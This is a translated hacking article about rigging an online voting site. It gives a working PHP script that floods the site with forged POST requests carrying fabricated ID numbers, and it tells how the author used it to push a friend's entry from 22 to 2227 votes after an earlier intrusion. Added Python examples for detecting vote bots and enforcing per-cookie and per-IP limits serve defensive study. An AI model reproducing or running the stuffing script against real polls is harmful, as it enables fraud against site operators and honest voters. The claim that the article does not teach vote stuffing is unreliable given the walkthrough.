Author: fhod
Please credit the original source ("evil") when reprinting this article.
A friend asked me for help a few days ago: a website was running a vote for model rooms, and he wanted to know whether there was a way to get his entry into first place. Naturally I agreed, and he sent me the site. I looked it over; it was ASP, and server security was done well, with no program vulnerabilities to be found. After getting in through a bypass and privilege escalation, I found the administrator was really something. My intention had been to modify the database, and I had just finished reading the voting code to locate the database connection file when the administrator kicked me out, so I let it go. A few days later my friend reminded me again, so I had to look once more; by then the vulnerabilities had all been closed.
So I started with the voting function itself, hoping to find a weak point that would achieve the vote stuffing directly (Figure 1).
My friend's model room is named "FengHua corridor", so in Figure 1 I ticked "FengHua corridor" (up to 10 entries can be selected). The name, contact number and ID card number I entered were all fictitious. After repeated test votes it turned out that this voting system verifies only the ID card number. Suppose the ID card number is 1234567890, the name is test and the contact number is 13013011111; you only need to change the ID card number to another value, for example 1234567891, to cast another vote. Neither the IP address nor cookies are checked, so vote stuffing is entirely achievable.
Figure 2 shows the successful voting packets.
Aname=%B7%E7%26%3B%BB%AA%C0%C8&username=%B2%E2%CA%D4&tel=238226%&idcord=13013011111&Submit=%CC%E1%BD%BB
Construct a URL based on the data packet:
http://www.xxxx.com/ad/20061221/a.asp?Action=add&Aname=%B7%E7%26%3B%BB%AA%...238226%&idcord=13013011111&Submit=%CC%E1%BD%BB
When you open this URL directly in IE, the prompt shown in Figure 3 appears.
But as soon as we change idcord=1234567890 to idcord=1234567891, the "vote successful" dialog box appears. Having understood the weakness of the voting system, I now wanted a way to collect votes with a program.
Write a packet-sending program with idcord as a variable, so that each time data is sent a new number is generated for it: for example, once idcord=1234567**9 has been cycled through, idcord=1234567*79 changes its value automatically.
Such a program can be written in VB, C or ASP, and it is not hard to implement in PHP either. The following PHP code was written by TTFCT, a brother from EST.
Complete program code (the target website has been altered accordingly):

<?php
error_reporting(0);                       // suppress warnings from failed connections
ini_set("max_execution_time", 0);         // never let the script time out
ini_set("default_socket_timeout", 2);
print_r("Voting....");
// four nested loops produce a new four-digit block for every request
for ($i = 0; $i <= 9; $i++)
for ($j = 0; $j <= 9; $j++)
for ($k = 0; $k <= 9; $k++)
for ($l = 0; $l <= 9; $l++)
{
    // raw HTTP POST assembled by hand and written straight to the socket
    $packet  = "POST /ad/20061221/a.asp?Action=add HTTP/1.1";
    $packet .= "Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*";
    $packet .= "Referer: http://www.xxx.com/ad/20061221/a.asp";
    $packet .= "Accept-Language: zh-cn";
    $packet .= "Content-Type: application/x-www-form-urlencoded";
    $packet .= "Accept-Encoding: gzip, deflate";
    $packet .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Maxthon)";
    $packet .= "Host: www.xxx.com";
    $packet .= "Content-Length: 113";
    $packet .= "Connection: Keep-Alive";
    $packet .= "Cache-Control: no-cache";
    $packet .= "Cookie: ASPSESSIONIDASDCQDBT=NKKJPDLAMAMNHJHHNBBLOCCH";
    // form body; the loop counters are spliced into the idcord value
    $packet .= "Aname=%B7%E7%26%3B%BB%AA%C0%C8&username=%B2%E2%CA%D4&tel=238226%&idcord=13013011111" . $i . $j . $k . $l . "90&Submit=%CC%E1%BD%BB";
    if ($fp = fsockopen("www.xxx.com", 80, $errno, $errstr, 50))
        if (fwrite($fp, $packet, strlen($packet)))
            print_r("Success to vote");
    sleep(2);                             // two-second pause between requests
    print_r("Wait for 2 seconds");
}
?>
PHP users can see at a glance that this is nothing more than a packet-sending program. ini_set("default_socket_timeout", 2); sets the interval between packets to 2 seconds. The four nested loops

for ($i = 0; $i <= 9; $i++)
for ($j = 0; $j <= 9; $j++)
for ($k = 0; $k <= 9; $k++)
for ($l = 0; $l <= 9; $l++)

define four variables, and in the packet that follows, idcord=1234".$i.$j.$k.$l."90 automatically generates a non-repeating idcord value for each request.
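The loop above leaves a very recognisable trace in a voting application's logs: one source address, votes at a fixed cadence, and ID numbers that change by a constant step. The following detector is an added example written for this article (not code from the original post or from TTFCT); the log format and the sample lines are constructed, and the thresholds are assumptions a site operator would tune.

```python
import re
import statistics
from collections import defaultdict
from datetime import datetime

# Constructed sample of a voting application's log (not from the original
# article): timestamp, client IP, session cookie id, submitted idcord.
SAMPLE_LOG = """\
2006-12-21 10:00:00 203.0.113.7 SESS-A idcord=1234000090
2006-12-21 10:00:02 203.0.113.7 SESS-A idcord=1234000190
2006-12-21 10:00:04 203.0.113.7 SESS-A idcord=1234000290
2006-12-21 10:00:06 203.0.113.7 SESS-A idcord=1234000390
2006-12-21 10:00:08 203.0.113.7 SESS-A idcord=1234000490
2006-12-21 10:01:30 198.51.100.4 SESS-B idcord=4405211234
2006-12-21 10:15:12 198.51.100.9 SESS-C idcord=3301119876
this line is malformed and must be skipped
"""

LINE_RE = re.compile(r"^(\d{4}-\d\d-\d\d \d\d:\d\d:\d\d) (\S+) (\S+) idcord=(\d+)$")


def parse_log(text):
    """Parse one vote per line into (timestamp, ip, session, idcord as int)."""
    votes = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue  # ignore lines that are not vote records
        ts = datetime.strptime(m.group(1), "%Y-%m-%d %H:%M:%S")
        votes.append((ts, m.group(2), m.group(3), int(m.group(4))))
    return votes


def find_vote_bots(text, min_votes=4, max_interval_jitter=0.5, max_id_step=1000):
    """Flag source IPs whose votes arrive at a near-constant cadence with idcord
    values that change by one small constant step: the fingerprint of a loop
    that fabricates ID numbers (the article's script steps by 100 every 2 s)."""
    by_ip = defaultdict(list)
    for ts, ip, session, idcord in parse_log(text):
        by_ip[ip].append((ts, session, idcord))
    findings = []
    for ip, rows in by_ip.items():
        if len(rows) < min_votes:
            continue  # too few votes from this address to judge a pattern
        rows.sort()
        intervals = [(b[0] - a[0]).total_seconds() for a, b in zip(rows, rows[1:])]
        id_steps = [b[2] - a[2] for a, b in zip(rows, rows[1:])]
        regular_cadence = statistics.pstdev(intervals) <= max_interval_jitter
        sequential_ids = len(set(id_steps)) == 1 and 0 < abs(id_steps[0]) <= max_id_step
        if regular_cadence and sequential_ids:
            findings.append({
                "ip": ip,
                "votes": len(rows),
                "sessions": len({r[1] for r in rows}),
                "interval_seconds": statistics.mean(intervals),
                "id_step": id_steps[0],
            })
    return findings


if __name__ == "__main__":
    for f in find_vote_bots(SAMPLE_LOG):
        print(f"{f['ip']}: {f['votes']} votes, one every {f['interval_seconds']:.0f} s, "
              f"idcord step {f['id_step']}, {f['sessions']} session(s)")
```

Run against the sample, the detector reports 203.0.113.7 with five votes two seconds apart and an idcord step of 100, while the two ordinary voters are left alone. A script that randomises its ID numbers defeats the step check, which is why the cadence and per-IP volume are tested separately and why the per-IP and cookie controls discussed at the end of the article matter more than detection after the fact.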
With the program written, we can start stuffing votes. Since it is a PHP program, we need hosting space that supports PHP to run it; if you have none, just install AppServ, which can be downloaded free from http://www.skycn.com/soft/13703.html. Installation is very simple, so I will not go into it.
First, let's look at the vote count before the stuffing begins. Figure 4 shows 22 votes. Then we run the PHP code (Figure 5).
If "Success to vote" appears, the vote went through.
Because I set a two-second interval, that is 1800 votes per hour; after a little over an hour the vote count for "FengHua Gallery" stood at 2227 votes (Figure 6).
My friend's entry naturally took first place, and I got a lavish lunch out of it.
In fact, a voting program like this only needs to verify cookies, allow one vote per IP address, enforce an interval between votes, and so on. This article is not teaching you how to stuff votes; I just want everyone to understand how vote stuffing is done, and how to prevent it once you know how it works.
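What those three controls look like when enforced on the server side, as an added example written for this article (not the page's ASP application, nor anyone's production code): the class below keeps the ID-number check that was the only control on the site and adds a server-issued session cookie that is consumed by a vote, and one accepted vote per source IP per window, which also fixes a minimum interval between votes. The class and function names, the window length and the replay scenarios are all assumptions; the clock is passed in so the policy can be exercised offline.

```python
import secrets


class VoteGuard:
    """Server-side acceptance policy for a one-vote-per-person poll
    (hypothetical example). Order of checks: cookie, ID number, source IP."""

    def __init__(self, ip_window_seconds=3600.0):
        self.ip_window = ip_window_seconds
        self.open_sessions = set()   # tokens issued by the server, not yet used
        self.used_ids = set()        # idcord values that have already voted
        self.last_vote_by_ip = {}    # ip -> time of its last accepted vote

    def issue_session(self):
        """Called when the voting page is served; the token goes into the cookie."""
        token = secrets.token_hex(16)
        self.open_sessions.add(token)
        return token

    def cast_vote(self, ip, session, idcord, now):
        """Return (accepted, reason). `now` is injected so the policy is testable."""
        if session not in self.open_sessions:
            return False, "session_missing_or_used"   # forged, replayed or absent cookie
        if idcord in self.used_ids:
            return False, "id_already_voted"          # the site's original check
        last = self.last_vote_by_ip.get(ip)
        if last is not None and now - last < self.ip_window:
            return False, "ip_rate_limited"           # one vote per IP per window
        self.open_sessions.discard(session)           # a session votes exactly once
        self.used_ids.add(idcord)
        self.last_vote_by_ip[ip] = now
        return True, "accepted"


def replay_same_cookie(guard, ip="203.0.113.7", start=0.0, count=5):
    """Replay the article's pattern: one cookie, one IP, idcord stepping by 100 every 2 s."""
    session = guard.issue_session()
    return [guard.cast_vote(ip, session, f"1234{n:04d}90", start + 2.0 * n)[1]
            for n in range(count)]


def replay_fresh_cookies(guard, ip="203.0.113.7", start=0.0, count=5):
    """Same loop, but a new session cookie is fetched before every vote."""
    return [guard.cast_vote(ip, guard.issue_session(), f"5678{n:04d}90", start + 2.0 * n)[1]
            for n in range(count)]


if __name__ == "__main__":
    g = VoteGuard()
    print(replay_same_cookie(g))                       # first accepted, rest rejected on cookie
    print(replay_fresh_cookies(g, ip="203.0.113.8"))   # first accepted, rest rejected on IP
    print(g.cast_vote("198.51.100.4", g.issue_session(), "4405211234", 10.0))  # ordinary voter
```

With the cookie reused, every submission after the first fails the session check; with a fresh cookie per request, the per-IP window rejects them instead; an ordinary voter on a different address is accepted. Per-IP limits are coarse where many users share one address (office NAT, campus networks), so the window should be chosen with the poll's audience in mind, and the logged rejections are themselves useful input for the kind of cadence analysis shown earlier.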